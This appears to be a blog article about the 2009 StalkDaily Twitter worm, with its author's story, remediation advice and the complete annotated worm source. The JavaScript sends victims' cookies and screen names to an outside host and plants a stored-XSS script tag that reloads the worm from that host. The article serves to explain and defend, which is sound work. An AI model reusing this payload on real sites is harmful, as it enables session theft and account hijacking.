As many people are aware, a Twitter worm broke loose on Saturday, April 11th, which became known as the “StalkDaily Worm.” The creator of the website StalkDaily.com, 17-year-old Mikeyy Mooney (contact: admin@stalkdaily.com), came clean Saturday evening in an interview with BNO News. He stated that he created the worm simply out of boredom, a common theme in malicious code. He admitted to having an interest in finding vulnerabilities in websites. He did in fact bring to light a Cross-Site Scripting (XSS) flaw that could have been used much more maliciously. The kid did a service by letting Twitter see the problem in their code, and he got some free advertising for his own website in the process. He says that the code did not steal any sensitive data or passwords. Examining the code only partly supports that claim: it does not touch passwords, but it does send the user’s Twitter cookies (everything in document.cookie) together with the screen name to a third-party server via an image request, which is session-cookie theft regardless of what was later done with them. The tweets and profile changes were made from the victim’s own browser through Twitter’s web form endpoints, using the victim’s live session rather than the stolen cookies. No computers were compromised, no accounts were used to steal financial information, and no one’s computer was sending cryptic communications to missile silos.
He started by creating several accounts with the worm code embedded in the profiles’ Bio section (the code reproduced below actually writes the payload into the profile’s website/URL field, `user[url]`); the fact that this was possible was the XSS bug he brought to light. Unlike other worms, where you are safe if you don’t click suspicious links, this worm ran simply by viewing an infected profile. The cookie theft happened immediately on page load; the script then waited about three seconds (a 3250 ms timer) before posting a tweet linking to Mooney’s site from the victim’s account and writing the worm into the victim’s own profile, so that the next visitor was infected in turn. No damage, no ruined finances, just a worm being exposed to the public.
Above Article By Cody Skinner
Note: Twitter’s service status is posted at http://status.twitter.com/
If you’re affected, What to do:
1. Go to your Twitter account settings and restore your bio — and check the website/URL field, which is where the code below writes its payload — to their normal values
2. In your browser settings, clear out your cookies and cache
3. Change your Twitter password. This is the step that matters most: the script sent a copy of your session cookies to a third-party server, and clearing cookies locally does nothing about that copy; changing the password (and signing out of all sessions, if Twitter offers that) is how you invalidate it
To prevent re-infection, What to do:
1. Avoid visiting Twitter profiles until the issue is fixed
2. If you land on a Twitter profile whose URL field points to StalkDaily, closing the tab within 3 seconds only prevents the tweet and the profile change; the cookie exfiltration in the code below happens as soon as the page renders, so still follow the steps above
3. Since these attacks only work when visiting Twitter profiles on the web, you might want to consider using a desktop Twitter client like Tweet Deck or Seesmic Desktop.
This is the JavaScript written by Mikeyy Mooney, the 17-year-old; the short remarks interleaved with the code (“The worm steals your cookie”, and so on) are the article’s annotations, not part of the worm.
// Annotated listing of the StalkDaily worm payload (x.js) as reproduced by the
// article. The code is kept token-for-token; only comments and line breaks were
// added, and the article's interleaved "---/..." remarks are kept as comments.
// This is a stored-XSS payload that runs with the victim's Twitter session in
// the browser. Do not load it in a browser that holds a live session.

// Tiny XMLHttpRequest wrapper with ActiveX fallbacks for old IE; used below for
// same-origin POSTs to twitter.com. Those requests ride on the victim's own
// session cookies, so the stolen cookie is not needed for them.
function XHConn() {
  var xmlhttp, bComplete = false;
  try { xmlhttp = new ActiveXObject("Msxml2.XMLHTTP"); }
  catch (e) { try { xmlhttp = new ActiveXObject("Microsoft.XMLHTTP"); }
  catch (e) { try { xmlhttp = new XMLHttpRequest(); }
  catch (e) { xmlhttp = false; }}}
  if (!xmlhttp) return null;
  // connect(sURL, sMethod, sVars, fnDone): asynchronous request. For GET, sVars
  // is appended as the query string; otherwise it is sent as a form body.
  // Returns false if the request could not be started, true once it is sent.
  this.connect = function(sURL, sMethod, sVars, fnDone) {
    if (!xmlhttp) return false;
    bComplete = false;
    sMethod = sMethod.toUpperCase();
    try {
      if (sMethod == "GET") {
        xmlhttp.open(sMethod, sURL+"?"+sVars, true);
        sVars = "";
      } else {
        xmlhttp.open(sMethod, sURL, true);
        // NOTE(review): "Method" is just a custom header that happens to look
        // like a request line; presumably boilerplate from the wrapper this
        // was copied from.
        xmlhttp.setRequestHeader("Method", "POST "+sURL+" HTTP/1.1");
        xmlhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
      }
      xmlhttp.onreadystatechange = function(){
        if (xmlhttp.readyState == 4 && !bComplete) {
          bComplete = true;
          // Both callers in this sample pass no fnDone, so this throws a
          // TypeError when the response arrives -- after send() has already
          // gone out, so it does not stop the worm.
          fnDone(xmlhttp);
        }};
      xmlhttp.send(sVars);
    } catch(z) { return false; }
    return true;
  };
  return this;
}

// Form-style URL encoding: encodeURIComponent(), then the characters it leaves
// alone (' ( ) * ~ !) are percent-encoded, "%20" becomes '+', and the two hex
// digits after each '%' are upper-cased. Applied to the cookie string, the
// tweet text and the XSS payload below.
function urlencode( str ) {
  var histogram = {}, tmp_arr = [];
  var ret = str.toString();
  // Global literal search-and-replace via split/join (no regex escaping needed).
  var replacer = function(search, replace, str) {
    var tmp_arr = [];
    tmp_arr = str.split(search);
    return tmp_arr.join(replace);
  };
  histogram["'"] = '%27';
  histogram['('] = '%28';
  histogram[')'] = '%29';
  histogram['*'] = '%2A';
  histogram['~'] = '%7E';
  histogram['!'] = '%21';
  histogram['%20'] = '+';
  ret = encodeURIComponent(ret);
  // 'search' and 'replace' are never declared: implicit globals.
  for (search in histogram) {
    replace = histogram[search];
    ret = replacer(search, replace, ret)
  }
  return ret.replace(/(%([a-z0-9]{2}))/g, function(full, m1, m2) { return "%"+m2.toUpperCase(); });
  return ret; // unreachable: the line above already returned
}

// Stage 1 -- runs immediately when the infected profile renders.
// Scrape the victim's screen name from Twitter's session meta tag. exec()
// returns null if the tag is absent (presumably when nobody is logged in), and
// username[1] then throws, which ends the script.
var content = document.documentElement.innerHTML;
userreg = new RegExp(/<meta content="(.*)" name="session-user-screen_name"/g);
var username = userreg.exec(content);
username = username[1];
var cookie;
cookie = urlencode(document.cookie);
// Exfiltrate every cookie readable by script (i.e. not HttpOnly) plus the
// screen name to an attacker-controlled host through an image GET. This is the
// cookie theft, and it is NOT behind the delay scheduled at the bottom.
document.write("<img src='http://mikeyylolz.uuuq.com/x.php?c=" + cookie + "&username=" + username + "'>");
// The worm steals your cookie   (article's annotation)
// Beacon to the promoted site; presumably a hit counter.
document.write("<img src='http://stalkdaily.com/log.gif'/>");

// Stage 2 -- runs after the 3250 ms delay scheduled below, acting as the victim
// through their live session. Twitter's CSRF token is scraped from the page so
// the POSTs pass the anti-forgery check; authtoken[1] throws if it is missing.
function wait() {
  var content = document.documentElement.innerHTML;
  authreg = new RegExp(/twttr.form_authenticity_token = '(.*)';/g);
  var authtoken = authreg.exec(content);
  authtoken = authtoken[1];
  //alert(authtoken);
  // Spam tweet text: one of six messages promoting the site, chosen at random.
  var randomUpdate=new Array();
  randomUpdate[0]="Dude, www.StalkDaily.com is awesome. What's the fuss?";
  randomUpdate[1]="Join www.StalkDaily.com everyone!";
  randomUpdate[2]="Woooo, www.StalkDaily.com";
  randomUpdate[3]="Virus!? What? www.StalkDaily.com is legit!";
  randomUpdate[4]="Wow...www.StalkDaily.com";
  randomUpdate[5]="@twitter www.StalkDaily.com";
  var genRand = randomUpdate[Math.floor(Math.random()*randomUpdate.length)];
  updateEncode = urlencode(genRand);
  // Self-propagation payload for the profile's website/URL field: the leading
  // '"' closes the attribute and '>' closes the anchor tag, a <script> then
  // reloads this same worm (x.js) from the attacker's host, and the trailing
  // '<a ' absorbs whatever markup followed the original attribute. This only
  // works if the field is rendered into an href without escaping the quote --
  // presumably the stored-XSS flaw the article describes.
  var xss = urlencode('http://www.stalkdaily.com"><script src="http://mikeyylolz.uuuq.com/x.js"></script><a ');
  // Post the spam tweet from the victim's account (same-origin POST, token attached).
  var ajaxConn = new XHConn();
  ajaxConn.connect("/status/update", "POST", "authenticity_token="+authtoken+"&status="+updateEncode+"&tab=home&update=update");
  // Makes you post a funny status   (article's annotation)
  // Write the payload into the victim's own profile so every visitor of that
  // profile runs it next. Note it is the URL field (user[url]), not the bio.
  var ajaxConn1 = new XHConn();
  ajaxConn1.connect("/account/settings", "POST", "authenticity_token="+authtoken+"&user[url]="+xss+"&tab=home&update=update");
  // Infects your account   (article's annotation)
}
// String-form setTimeout is evaluated as code; 3250 ms is the "three seconds"
// the article mentions. Only stage 2 is delayed -- the cookie upload above has
// already happened by the time this fires.
setTimeout("wait()",3250);






















